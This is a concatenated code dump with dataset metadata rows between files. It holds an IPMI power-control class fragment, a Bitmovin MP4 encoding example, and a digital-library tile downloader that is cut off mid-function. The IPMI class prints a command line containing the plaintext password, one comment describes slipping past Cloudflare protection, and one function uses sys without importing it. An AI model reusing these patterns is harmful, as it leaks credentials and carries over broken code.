def __init__(self, config, nodeName, hostInfo):
# should send data obj instead of hostInfo
self.config = config
self.nodeName = nodeName + "-ipmi"
self.password = hostInfo['ipmi_password']
self.user = hostInfo['ipmi_user']
self.powerStatus = None
self.verbose = False
self.log = logging.getLogger(__name__)
self.ipmicmd = "ipmitool -I lanplus -U %s -H %s -P %s " % (self.user, self.nodeName, self.password)
print self.ipmicmd
def setVerbose(self, verbose):
self.verbose = verbose
def __executeCmd(self, cmd):
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out= a.stdout.readline()
err = a.stderr.readline()
if self.verbose:
print "out is ", out
print "err is ", err
if err:
self.log.info("%s %s" % (self.nodeName, err))
return -1
self.log.info("%s %s" % (self.nodeName, out))
return 1
def __setPowerStatus(self):
if self.verbose:
print self.ipmicmd
cmd = self.ipmicmd + "chassis power status"
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = a.stdout.readline()
myerr = a.stderr.readline()
if "off" in output:
self.powerStatus = 0
if "on" in output:
self.powerStatus = 1
if "Unable" in myerr:
self.powerStatus = -1
return output
def isPowered(self):
if self.powerStatus == None:
self.__setPowerStatus()
self.log.info("Hardware get power status : %s", self.powerStatus)
return self.powerStatus
def getPowerStatus(self):
#self.log.info("getPowerStatus :%s" % self.nodeName)
return self.isPowered()
def powerOn(self):
self.log.info("Hardware power on : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power on"
return self.__executeCmd(cmd)
def powerOff(self):
self.log.info("Hardware power off : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power off"
return self.__executeCmd(cmd)
def powerOffSoft(self):
self.log.info("Hardware power off (soft): %s", self.nodeName)
cmd = self.ipmicmd + "chassis power soft"
return self.__executeCmd(cmd)
def powerCycle(self):
self.log.info("Hardware power cycle : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power cycle"
return self.__executeCmd(cmd)
def powerReset(self):
self.log.info("Hardware power reset : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power reset"
return self.__executeCmd(cmd)
def activateConsole(self):
self.log.info("Hardware sol activate : %s", self.nodeName)
cmd = self.ipmicmd + "sol activate"
return self.__executeCmd(cmd)
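# Illustrative usage (assumption; node name and credentials are hypothetical):
#   ipmi = Ipmi(config, 'node01', {'ipmi_user': 'admin', 'ipmi_password': 'secret'})
#   if not ipmi.isPowered():
#       ipmi.powerOn()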
| apache-2.0 | 2,151,156,001,504,405,200 | 29.084034 | 101 | 0.705866 | false |
bitmovin/bitmovin-python | examples/encoding/create_mp4_encoding_with_stream_metadata.py | 1 | 5198 | import datetime
from bitmovin import Bitmovin, Encoding, HTTPSInput, H264CodecConfiguration, \
AACCodecConfiguration, H264Profile, StreamInput, SelectionMode, Stream, EncodingOutput, ACLEntry, ACLPermission, \
MuxingStream, CloudRegion, MP4Muxing, S3Output
from bitmovin.errors import BitmovinError
from bitmovin.resources.models.encodings.stream_metadata import StreamMetadata
API_KEY = '<INSERT_YOUR_API_KEY>'
# https://<INSERT_YOUR_HTTP_HOST>/<INSERT_YOUR_HTTP_PATH>
HTTPS_INPUT_HOST = '<INSERT_YOUR_HTTPS_HOST>'
HTTPS_INPUT_PATH = '<INSERT_YOUR_HTTPS_PATH>'
S3_OUTPUT_ACCESSKEY = '<INSERT_YOUR_ACCESS_KEY>'
S3_OUTPUT_SECRETKEY = '<INSERT_YOUR_SECRET_KEY>'
S3_OUTPUT_BUCKETNAME = '<INSERT_YOUR_BUCKET_NAME>'
date_component = datetime.datetime.now().strftime('%Y-%m-%dT%H-%M-%S')
OUTPUT_BASE_PATH = 'your/output/base/path/{}/'.format(date_component)
bitmovin = Bitmovin(api_key=API_KEY)
encoding_profiles = [dict(height=240, bitrate=400000, fps=None),
dict(height=360, bitrate=800000, fps=None),
dict(height=480, bitrate=1200000, fps=None),
dict(height=720, bitrate=2400000, fps=None),
dict(height=1080, bitrate=4800000, fps=None)]
def main():
https_input = HTTPSInput(name='create_simple_encoding HTTPS input', host=HTTPS_INPUT_HOST)
https_input = bitmovin.inputs.HTTPS.create(https_input).resource
s3_output = S3Output(access_key=S3_OUTPUT_ACCESSKEY,
secret_key=S3_OUTPUT_SECRETKEY,
bucket_name=S3_OUTPUT_BUCKETNAME,
name='Sample S3 Output')
s3_output = bitmovin.outputs.S3.create(s3_output).resource
encoding = Encoding(name='Python Example - Add StreamMetadata to MP4Muxing',
cloud_region=CloudRegion.GOOGLE_EUROPE_WEST_1)
encoding = bitmovin.encodings.Encoding.create(encoding).resource
video_input_stream = StreamInput(input_id=https_input.id,
input_path=HTTPS_INPUT_PATH,
selection_mode=SelectionMode.AUTO)
audio_input_stream = StreamInput(input_id=https_input.id,
input_path=HTTPS_INPUT_PATH,
selection_mode=SelectionMode.AUTO)
audio_codec_configuration = AACCodecConfiguration(name='example_audio_codec_configuration_english',
bitrate=128000,
rate=48000)
audio_codec_configuration = bitmovin.codecConfigurations.AAC.create(audio_codec_configuration).resource
stream_metadata = StreamMetadata(language='spa')
audio_stream = Stream(codec_configuration_id=audio_codec_configuration.id,
input_streams=[audio_input_stream], name='Sample Stream Audio', metadata=stream_metadata)
audio_stream = bitmovin.encodings.Stream.create(object_=audio_stream,
encoding_id=encoding.id).resource
for profile in encoding_profiles:
video_codec_configuration = H264CodecConfiguration(
name='python_example_mp4muxing_with_metadata_{}p'.format(profile['height']),
bitrate=profile['bitrate'],
rate=profile['fps'],
width=None,
height=profile['height'],
profile=H264Profile.HIGH)
video_codec_configuration = bitmovin.codecConfigurations.H264.create(video_codec_configuration).resource
video_stream = Stream(codec_configuration_id=video_codec_configuration.id,
input_streams=[video_input_stream],
name='Python Example H264 Stream {}p'.format(profile['height']))
video_stream = bitmovin.encodings.Stream.create(object_=video_stream,
encoding_id=encoding.id).resource
create_muxing(encoding, s3_output, video_stream, audio_stream, 'video_audio_{}p.mp4'.format(profile['height']))
bitmovin.encodings.Encoding.start(encoding_id=encoding.id)
try:
bitmovin.encodings.Encoding.wait_until_finished(encoding_id=encoding.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for encoding to finish: {}'.format(bitmovin_error))
def create_muxing(encoding, output, video_stream, audio_stream, filename):
acl_entry = ACLEntry(permission=ACLPermission.PUBLIC_READ)
video_muxing_output = EncodingOutput(output_id=output.id,
output_path=OUTPUT_BASE_PATH,
acl=[acl_entry])
video_muxing_stream = MuxingStream(video_stream.id)
audio_muxing_stream = MuxingStream(audio_stream.id)
muxing = MP4Muxing(streams=[video_muxing_stream, audio_muxing_stream],
outputs=[video_muxing_output],
filename=filename)
muxing = bitmovin.encodings.Muxing.MP4.create(object_=muxing,
encoding_id=encoding.id).resource
if __name__ == '__main__':
main()
| unlicense | -762,027,933,942,152,000 | 45.410714 | 119 | 0.628896 | false |
georgthegreat/dancebooks-bibtex | scripts/lib.py | 1 | 31786 | #!/usr/bin/env python3
import functools
import http.client
import json
import math
import os
import subprocess
import shutil
import time
import uuid
from xml.etree import ElementTree
import bs4
import opster
import requests
#NOTE: if the website is protected by cloudflare, removing User-Agent header will help to pass it by
USER_AGENT = "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0"
HEADERS = {
"User-Agent": USER_AGENT
}
TIMEOUT = 30
###################
#UTILITY FUNCTIONS
###################
def retry(retry_count, delay=0, delay_backoff=1):
def actual_decorator(func):
@functools.wraps(func)
		def do_retry(*args, **kwargs):
			retry_number = 0
			current_delay = delay
			#keep calling func until it succeeds or the retry budget is spent
			while True:
				try:
					return func(*args, **kwargs)
				except Exception:
					if retry_number >= retry_count:
						raise RuntimeError(f"Failed to get results after {retry_number} retries")
					time.sleep(current_delay)
					current_delay *= delay_backoff
					retry_number += 1
		return do_retry
return actual_decorator
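#Illustrative usage (assumption; mirrors the commented-out decorations below):
#	@retry(retry_count=3, delay=1, delay_backoff=2)
#	def fetch_page(url):
#		return make_request(url)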
#using single session for all requests
session = requests.Session()
#@retry(retry_count=3)
def make_request(*args, **kwargs):
"""
Performs the request and returns requests.Response object.
Accepts both raw urls and prepared requests
"""
if isinstance(args[0], str):
url = args[0]
response = requests.get(*args, headers=HEADERS, timeout=TIMEOUT, **kwargs)
elif isinstance(args[0], requests.Request):
request = args[0].prepare()
url = request.url
args = args[1:]
request.headers = HEADERS
response = session.send(request, *args, timeout=TIMEOUT, **kwargs)
if response.status_code == 200:
return response
else:
raise ValueError(f"While getting {url}: HTTP status 200 was expected. Got {response.status_code}")
#@retry(retry_count=3)
def get_json(*args, **kwargs):
"""
Returns parsed JSON object received via HTTP GET request
"""
return json.loads(make_request(*args, **kwargs).content)
def get_xml(*args, **kwargs):
"""
Returns parsed xml (as ElementTree) received via HTTP GET request
"""
return ElementTree.fromstring(make_request(*args, **kwargs).content)
def get_text(*args, **kwargs):
return make_request(*args, **kwargs).content.decode("utf-8")
def get_binary(output_filename, url_or_request, *args, **kwargs):
"""
Writes binary data received via HTTP GET request to output_filename
Accepts both url as string and request.Requests
"""
BLOCK_SIZE = 4096
response = make_request(url_or_request, *args, stream=True, **kwargs)
with open(output_filename, "wb") as file:
for chunk in response.iter_content(BLOCK_SIZE):
file.write(chunk)
def make_output_folder(downloader, book_id):
folder_name = "{downloader}_{book_id}".format(
downloader=downloader,
book_id=book_id\
.replace('/', '_')
.replace(':', '_')
)
os.makedirs(folder_name, exist_ok=True)
return folder_name
def make_output_filename(base, page=None, extension="bmp"):
result = base
if isinstance(page, int):
result = os.path.join(result, f"{page:08}")
elif page is not None:
result = os.path.join(result, page)
if extension is not None:
result += "." + extension
return result
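#Examples (illustrative): make_output_filename("out", page=3) -> "out/00000003.bmp",
#make_output_filename("out", page="cover", extension="jpg") -> "out/cover.jpg"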
def make_temporary_folder():
return str(uuid.uuid4())
class TileSewingPolicy(object):
def __init__(self, tiles_number_x, tiles_number_y, tile_size, image_width=None, image_height=None, overlap=None):
self.tiles_number_x = tiles_number_x
self.tiles_number_y = tiles_number_y
self.tile_size = tile_size
self.image_width = image_width
self.image_height = image_height
self.overlap = overlap
@staticmethod
def from_image_size(width, height, tile_size):
tiles_number_x = math.ceil(width / tile_size)
tiles_number_y = math.ceil(height / tile_size)
return TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size, image_width=width, image_height=height)
def sew_tiles_with_montage(folder, output_file, policy):
"""
Invokes montage tool from ImageMagick package to sew tiles together
"""
def format_magick_geometry(policy):
geometry = ""
if policy.tile_size is not None:
geometry += f"{policy.tile_size}x{policy.tile_size}"
if policy.overlap is not None:
geometry += f"-{policy.overlap}-{policy.overlap}"
if geometry:
#WARN:
# Do not allow enlarging tiles.
			# Certain libraries (e. g. Gallica) use variable tile size
geometry += '>'
return geometry
def format_magick_tile(policy):
return f"{policy.tiles_number_x}x{policy.tiles_number_y}"
# Sewing tiles
cmd_line = [
"montage",
f"{folder}/*",
"-mode", "Concatenate"
]
geometry = format_magick_geometry(policy)
if geometry:
cmd_line += ["-geometry", geometry]
cmd_line += [
"-tile", format_magick_tile(policy),
output_file
]
print(f"Sewing tiles with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
if policy.image_width and policy.image_height:
# Cropping extra boundaries (right and bottom) added during sewing
cmd_line = [
"convert",
output_file,
"-extent", f"{policy.image_width}x{policy.image_height}",
output_file
]
print(f"Cropping output image with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
def download_and_sew_tiles(output_filename, url_maker, policy):
	if os.path.exists(output_filename):
		print(f"Skip downloading existing file {output_filename}")
		return
tmp_folder = make_temporary_folder()
os.mkdir(tmp_folder)
try:
print(f"Downloading {policy.tiles_number_x}x{policy.tiles_number_y} tiled image to {output_filename}")
for tile_x in range(policy.tiles_number_x):
for tile_y in range(policy.tiles_number_y):
tile_file = os.path.join(tmp_folder, f"{tile_y:08d}_{tile_x:08d}.jpg")
get_binary(
tile_file,
url_maker(tile_x, tile_y)
)
sew_tiles_with_montage(tmp_folder, output_filename, policy)
finally:
if "KEEP_TEMP" not in os.environ:
shutil.rmtree(tmp_folder)
class IIPMetadata(object):
def __init__(self, tile_size, width, height, max_level):
self.tile_size = tile_size
self.width = width
self.height = height
self.max_level = max_level
@staticmethod
def from_json(json):
tile_size = 256
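		#json["d"] lists image dimensions per resolution level (the last entry being
		#the full-resolution one) and json["m"] is the maximum zoom level; the tile
		#size is absent from this metadata flavour, 256 appears to be the value used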
width = int(json["d"][-1]["w"])
height = int(json["d"][-1]["h"])
max_level = json["m"]
return IIPMetadata(tile_size, width, height, max_level)
@staticmethod
def from_text(text):
"""
Parses the following text:
```
Max-size:3590 3507
Tile-size:256 256
Resolution-number:5
```
"""
tile_size = None
width = None
height = None
max_level = None
for line in text.split('\n'):
parts = line.split(':')
if parts[0] == "Max-size":
(width, height) = map(int, parts[1].split())
elif parts[0] == "Tile-size":
tile_size = int(parts[1].split()[0])
elif parts[0] == "Resolution-number":
max_level = int(parts[1]) - 1
else:
pass
return IIPMetadata(tile_size, width, height, max_level)
def download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename):
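	"""
	Downloads a single IIP-served image at its maximum resolution level,
	tile by tile, and sews the tiles into output_filename
	"""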
policy = TileSewingPolicy.from_image_size(metadata.width, metadata.height, metadata.tile_size)
download_and_sew_tiles(
output_filename,
lambda tile_x, tile_y: requests.Request(
"GET",
fastcgi_url,
#WARN: passing parameters as string in order to send them in urldecoded form
#(iip does not support urlencoded parameters)
params=f"FIF={remote_filename}&JTL={metadata.max_level},{tile_y * policy.tiles_number_x + tile_x}",
),
policy
)
def download_book_from_iip(metadata_url, fastcgi_url, output_folder, files_root):
"""
Downloads book served by IIPImage fastcgi servant.
API is documented here:
http://iipimage.sourceforge.net/documentation/protocol/
"""
metadata = get_json(metadata_url)["pgs"]
print(f"Going to download {len(metadata)} pages")
for page_number, page_metadata in enumerate(metadata):
iip_page_metadata = IIPMetadata.from_json(page_metadata)
remote_filename = os.path.join(files_root, page_metadata["f"])
output_filename = make_output_filename(output_folder, page_number)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page_number:04d}")
continue
else:
print(f"Downloading page #{page_number:04d}")
download_image_from_iip(fastcgi_url, remote_filename, iip_page_metadata, output_filename)
def download_image_from_iiif(base_url, output_filename):
"""
Downloads single image via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
DESIRED_QUALITIES = ["color", "native", "default"]
DESIRED_FORMATS = ["png", "tif", "jpg"]
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
left = tile_size * tile_x
top = tile_size * tile_y
tile_width = min(width - left, tile_size)
tile_height = min(height - top, tile_size)
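			#IIIF Image API request template: {base}/{region x,y,w,h}/{size w,h}/{rotation}/{quality}.{format}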
tile_url = f"{base_url}/{left},{top},{tile_width},{tile_height}/{tile_width},{tile_height}/0/{desired_quality}.{desired_format}"
return tile_url
metadata_url = f"{base_url}/info.json"
metadata = get_json(metadata_url)
if "tiles" in metadata:
# Served by e. g. vatlib servant
tile_size = metadata["tiles"][0]["width"]
else:
# Served by e. g. Gallica servant
tile_size = 1024
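			#no tile size is advertised here; 1024 is an assumption Gallica's servant accepts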
width = metadata["width"]
height = metadata["height"]
desired_quality = "default"
desired_format = "jpg"
profile = metadata.get("profile")
	if (profile is not None) and (not isinstance(profile, str)) and (len(profile) >= 2):
# Profile is not served by Gallica servant, but served by e. g. British Library servant
# Complex condition helps to ignore missing metadata fields, see e. g.:
# https://gallica.bnf.fr/iiif/ark:/12148/btv1b10508435s/f1/info.json
# http://www.digitale-bibliothek-mv.de/viewer/rest/image/PPN880809493/00000001.tif/info.json
if "qualities" in profile[1]:
available_qualities = profile[1]["qualities"]
for quality in DESIRED_QUALITIES:
if quality in available_qualities:
desired_quality = quality
break
else:
raise RuntimeError(f"Can not choose desired image quality. Available qualities: {available_qualities!r}")
if "formats" in profile[1]:
available_formats = profile[1]["formats"]
for format in DESIRED_FORMATS:
if format in available_formats:
desired_format = format
break
else:
raise RuntimeError(f"Can not choose desired image format. Available formats: {available_formats!r}")
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
download_and_sew_tiles(output_filename, UrlMaker(), policy)
def download_book_from_iiif(manifest_url, output_folder):
"""
Downloads entire book via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
manifest = get_json(manifest_url)
canvases = manifest["sequences"][0]["canvases"]
for page, metadata in enumerate(canvases):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page:04d}")
continue
base_url = metadata["images"][-1]["resource"]["service"]["@id"]
download_image_from_iiif(base_url, output_filename)
MAX_TILE_NUMBER = 100
def guess_tiles_number_x(url_maker):
tiles_number_x = 0
for tiles_number_x in range(MAX_TILE_NUMBER):
probable_url = url_maker(tiles_number_x, 0)
if probable_url is None:
break
		head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_x
def guess_tiles_number_y(url_maker):
tiles_number_y = 0
for tiles_number_y in range(MAX_TILE_NUMBER):
probable_url = url_maker(0, tiles_number_y)
if probable_url is None:
break
head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_y
###################
#TILE BASED DOWNLOADERS
###################
@opster.command()
def gallica(
id=("", "", "Id of the book to be downloaded (e. g. 'btv1b7200356s')")
):
"""
Downloads book from https://gallica.bnf.fr/
"""
manifest_url = f"https://gallica.bnf.fr/iiif/ark:/12148/{id}/manifest.json"
output_folder = make_output_folder("gallica", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def encyclopedie(
volume=("", "", "Volume to be downloaded (e. g. '24')"),
page=("", "", "Page number to be downloaded (e. g. '247')")
):
"""
Downloads single image from http://enccre.academie-sciences.fr/encyclopedie
"""
volume = int(volume)
page = int(page)
#there is no manifest.json file, slightly modified IIIF protocol is being used by the website
image_list_url = f"http://enccre.academie-sciences.fr/icefront/api/volume/{volume}/imglist"
image_list_metadata = get_json(image_list_url)
image_metadata = image_list_metadata[page]
image_url = f"http://enccre.academie-sciences.fr/digilib/Scaler/IIIF/{image_metadata['image']}"
output_file = f"{page:04d}.bmp"
download_image_from_iiif(image_url, output_file)
@opster.command()
def vatlib(
id=("", "", "Id of the book to be downloaded (e. g. 'MSS_Cappon.203')")
):
"""
Downloads book from http://digi.vatlib.it/
"""
manifest_url = f"http://digi.vatlib.it/iiif/{id}/manifest.json"
output_folder = make_output_folder("vatlib", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def mecklenburgVorpommern(
id=("", "", "Id of the book to be downloaded (e. g. 'PPN880809493')")
):
"""
Downloads book from http://www.digitale-bibliothek-mv.de
"""
# it looks like Mecklenburg-Vorpommern does not use manifest.json
output_folder = make_output_folder("mecklenburg_vorpommern", id)
for page in range(1, 1000):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
continue
try:
base_url = f"http://www.digitale-bibliothek-mv.de/viewer/rest/image/{id}/{page:08d}.tif"
download_image_from_iiif(base_url, output_filename)
except ValueError:
break
@opster.command()
def prlib(
id=("", "", "Book id to be downloaded (e. g. '20596C08-39F0-4E7C-92C3-ABA645C0E20E')"),
secondary_id=("", "", "Secondary id of the book (e. g. '5699092')"),
page=("p", "", "Download specified (zero-based) page only"),
):
"""
Downloads book from https://www.prlib.ru/
"""
metadata_url = f"https://content.prlib.ru/metadata/public/{id}/{secondary_id}/{id}.json"
files_root = f"/var/data/scans/public/{id}/{secondary_id}/"
fastcgi_url = "https://content.prlib.ru/fcgi-bin/iipsrv.fcgi"
output_folder = make_output_folder("prlib", id)
if page:
page = int(page)
output_filename = make_output_filename(output_folder, page)
metadata = get_json(metadata_url)
page_metadata = metadata[page]
remote_filename = os.path.join(files_root, page_metadata["f"])
download_image_from_iip(fastcgi_url, remote_filename, page_metadata, output_filename)
else:
download_book_from_iip(
metadata_url=metadata_url,
fastcgi_url=fastcgi_url,
files_root=files_root,
output_folder=output_folder
)
@opster.command()
def nga(
id=("", "", "Image id to be downloaded (e. g. `49035`)")
):
"""
Downloads single image from https://www.nga.gov
"""
	slashed_image_id = "/".join(id) #will produce "4/9/0/3/5" from id "49035"
remote_filename = f"/public/objects/{slashed_image_id}/{id}-primary-0-nativeres.ptif"
	fastcgi_url = "https://media.nga.gov/fastcgi/iipsrv.fcgi"
metadata = IIPMetadata.from_text(
get_text(f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number")
)
download_image_from_iip(
fastcgi_url=fastcgi_url,
remote_filename=remote_filename,
metadata=metadata,
output_filename=f"nga.{id}.bmp"
)
@opster.command()
def hab(
id=("", "", "Image id to be downloaded (e. g. `grafik/uh-4f-47-00192`)")
):
"""
Downloads single image from http://diglib.hab.de and http://kk.haum-bs.de
(both redirect to Virtuelles Kupferstichkabinett website, which is too hard to be typed)
"""
#The site does not use any metadata and simply sends unnecessary requests to backend
	#Using HEAD requests to get the maximum available zoom level and the tile grid size
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
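				#Zoomify buckets tiles into TileGroup folders of 256 tiles each; rather than
				#computing the group index, probe the first few groups (enough for small images)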
probable_url = f"http://diglib.hab.de/varia/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 10
TILE_SIZE = 256
max_zoom = None
for test_zoom in range(MAX_ZOOM + 1):
if UrlMaker(test_zoom)(0, 0) is not None:
max_zoom = test_zoom
else:
#current zoom is not available - consider previous one to be maximal
break
assert(max_zoom is not None)
print(f"Guessed max_zoom={max_zoom}")
#The site does not use any metadata and simply sends unnecessary requests to backend
#Guessing tiles_number_x, tiles_number_y using HEAD requests with guessed max_zoom
#
#UrlMaker returns None when corresponding tile does not exist
#
#FIXME: one can save some requests using bisection here,
#but python standard library is too poor to have one
url_maker = UrlMaker(max_zoom)
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, TILE_SIZE)
output_filename = make_output_filename(id.replace("/", "."))
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def yaleImage(
id=("", "", "Image id to be downloaded (e. g. `lwlpr11386`)")
):
"""
Downloads image from http://images.library.yale.edu/
"""
class UrlMaker(object):
"""
Similar to UrlMaker from hab() method. Should be deduplicated once
"""
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 5
#FIXME: replace 011000 with computed expression
metadata = ElementTree.fromstring(get_text(f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/ImageProperties.xml"))
width = int(metadata.attrib["WIDTH"])
height = int(metadata.attrib["HEIGHT"])
tile_size = int(metadata.attrib["TILESIZE"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
output_filename = make_output_filename(id)
download_and_sew_tiles(output_filename, UrlMaker(MAX_ZOOM), policy)
@opster.command()
def yaleBook(
id=("", "", "Image id to be downloaded (e. g. `BRBL_Exhibitions/7/1327507/1327507`)")
):
"""
Downloads image from https://brbl-zoom.library.yale.edu
"""
modulo = id[-1]
output_filename = make_output_filename("", id)
remote_filename = f"BRBL_Exhibitions/{modulo}/{id}/{id}.jp2"
fastcgi_url = "https://brbl-zoom.library.yale.edu/fcgi-bin/iipsrv.fcgi"
metadata_url = f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number"
metadata = IIPMetadata.from_text(get_text(metadata_url))
download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename)
@opster.command()
def britishLibraryBook(
id=("", "", "Book id to be downloaded (e. g. `vdc_100026052453`, as it is displayed in the viewer url)")
):
"""
Downloads a book from http://explore.bl.uk
"""
output_folder = make_output_folder("bl", id)
manifest_url = f"https://api.bl.uk/metadata/iiif/ark:/81055/{id}.0x000001/manifest.json"
download_book_from_iiif(manifest_url, output_folder)
class DeepZoomUrlMaker(object):
def __init__(self, base_url, max_zoom, ext="jpg"):
self.base_url = base_url
self.max_zoom = max_zoom
self.ext = ext
def __call__(self, tile_x, tile_y):
return f"{self.base_url}/{self.max_zoom}/{tile_x}_{tile_y}.{self.ext}"
def download_image_from_deepzoom(output_filename, metadata_url, url_maker):
image_metadata = get_xml(metadata_url)
tile_size = int(image_metadata.attrib["TileSize"])
overlap = int(image_metadata.attrib["Overlap"])
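	#adjacent DZI tiles share `overlap` pixels on each side; the montage geometry
	#offsets (see format_magick_geometry) strip them while sewing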
	size_metadata = image_metadata[0] #getchildren() was removed in Python 3.9; indexing works everywhere
width = int(size_metadata.attrib["Width"])
height = int(size_metadata.attrib["Height"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
policy.overlap = overlap
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def leidenCollection(
id=("", "", "Image id of the painting to be downloaded(e. g. `js-108-jan_steen-the_fair_at_warmond_files`)")
):
"""
Downloads single image from https://www.theleidencollection.com
"""
MAX_ZOOM = 13
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
return f"https://www.theleidencollection.com/LeidenCollectionSamples/images/{id}_files/{MAX_ZOOM}/{tile_x}_{tile_y}.jpg"
url_maker = UrlMaker()
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size=None, overlap=None)
output_filename = make_output_filename("", id)
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def britishLibraryManuscript(
id=("", "", "Page id of the manuscript to be downloaded (e. g. `add_ms_12531!1_f005r`)")
):
"""
Downloads single manuscript page from http://www.bl.uk/manuscripts/Default.aspx
"""
	def parse_id(full_id):
		manuscript_id, _, page_id = full_id.rpartition('_')
		return (manuscript_id, page_id)
manuscript_id, page_id = parse_id(id)
#WARN: here and below base_url and metadata_url have common prefix. One might save something
metadata_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}.xml"
output_folder = make_output_folder("bl", manuscript_id)
output_filename = make_output_filename(output_folder, page_id)
MAX_ZOOM = 13
base_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def makAt(
id=("", "", "Id of the image to be downloaded (e. g. `ki-6952-1_1`)")
):
"""
Downloads single image from https://sammlung.mak.at/
"""
metadata_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}.xml"
output_filename = make_output_filename('.', id)
MAX_ZOOM = 11
base_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def uniJena(
id=("", "", "Id of the image to be downloaded, including document id (e. g. `00108217/JLM_1787_H002_0003_a`)")
):
"""
Downloads single image from https://zs.thulb.uni-jena.de
Requires a lot of work though
"""
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
return f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/{self.zoom}/{tile_y}/{tile_x}.jpg"
metadata_url = f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/imageinfo.xml"
metadata = get_xml(metadata_url)
output_filename = make_output_filename("", os.path.basename(id))
width = int(metadata.attrib["width"])
height = int(metadata.attrib["height"])
zoom = int(metadata.attrib["zoomLevel"])
TILE_SIZE = 256
policy = TileSewingPolicy.from_image_size(width, height, TILE_SIZE)
url_maker = UrlMaker(zoom)
download_and_sew_tiles(output_filename, url_maker, policy)
subprocess.check_call([
"convert",
output_filename,
"-crop", f"{width}x{height}+0+0",
output_filename
])
###################
#PAGE BASED DOWNLOADERS
###################
@opster.command()
def locMusdi(
id=("", "", "Id of the book to be downloaded (e. g. `056`)"),
start_from=("", 1, "The number of the first page in the sequence (defaults to 1)")
):
"""
Downloads book from Library of Congress Music/Dance instruction
"""
start_from = int(start_from)
# Some ids are known to be missing
MISSING_IDS = [
"050", "054", "057", "061", "071",
"078", "083", "095", "100", "103",
"106", "111", "116", "120", "135",
"152", "172", "173", "175", "176",
"180", "185", "192", "193", "196",
"206", "223", "231", "232", "234",
"238", "244", "249",
]
MAX_ID = 252
if len(id) != 3:
print("Expected id to have 3 digits. Please, recheck the ID.")
sys.exit(1)
if id in MISSING_IDS:
print(f"The book with id musdi.{id} is known to be missing. Please, recheck the ID.")
sys.exit(1)
if int(id) > MAX_ID:
print(f"The maximum id is musdi.{MAX_ID}. Please, recheck the ID.")
sys.exit(1)
output_folder = make_output_folder("locMusdi", id)
for page in range(start_from, 1000):
base_url = f"https://memory.loc.gov/music/musdi/{id}/{page:04d}"
url = None
for extension in ["tif", "jpg"]:
output_filename = make_output_filename(output_folder, page, extension=extension)
if os.path.exists(output_filename):
break
maybe_url = base_url + "." + extension
head_response = requests.head(maybe_url)
if head_response.status_code == http.client.OK:
url = maybe_url
break
if url is None:
break
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
